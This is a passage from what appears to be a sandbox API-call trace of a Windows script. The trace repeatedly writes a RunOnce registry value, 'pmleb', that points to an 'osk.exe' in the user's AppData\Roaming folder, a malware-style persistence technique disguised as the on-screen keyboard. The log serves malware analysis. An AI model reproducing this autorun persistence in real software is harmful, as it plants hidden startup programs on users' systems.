ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.439] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0078.439] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.439] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x22 [0078.439] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.440] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0078.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.440] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.440] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.440] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.441] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.441] RegCloseKey (hKey=0x280) returned 0x0 [0078.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.441] SetTimer (hWnd=0x20280, nIDEvent=0x2021, uElapse=0xa, lpTimerFunc=0x0) returned 0x2021 [0078.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.442] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.442] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.442] KillTimer (hWnd=0x20280, uIDEvent=0x2021) returned 1 [0078.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.443] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.443] IUnknown:Release (This=0x787518) returned 0x1 [0078.443] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.443] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.443] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.443] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.443] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0078.443] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.443] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x23 [0078.443] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.444] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0078.444] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.444] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.444] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.444] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.444] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.445] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.445] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0078.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.445] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.445] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.445] RegCloseKey (hKey=0x280) returned 0x0 [0078.445] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.445] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.445] SetTimer (hWnd=0x20280, nIDEvent=0x2022, uElapse=0xa, lpTimerFunc=0x0) returned 0x2022 [0078.445] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.458] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.458] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.458] KillTimer (hWnd=0x20280, uIDEvent=0x2022) returned 1 [0078.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.458] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.459] IUnknown:Release (This=0x787518) returned 0x1 [0078.459] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0078.459] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.459] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.459] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.459] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0078.459] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.459] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x24 [0078.460] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.460] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0078.460] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.460] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.460] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.460] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.460] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.460] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.461] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.461] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.461] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.461] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.461] RegCloseKey (hKey=0x280) returned 0x0 [0078.461] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.461] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.461] SetTimer (hWnd=0x20280, nIDEvent=0x2023, uElapse=0xa, lpTimerFunc=0x0) returned 0x2023 [0078.461] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.473] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.474] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.474] KillTimer (hWnd=0x20280, uIDEvent=0x2023) returned 1 [0078.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.474] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.474] IUnknown:Release (This=0x787518) returned 0x1 [0078.474] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.474] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.474] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.475] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, 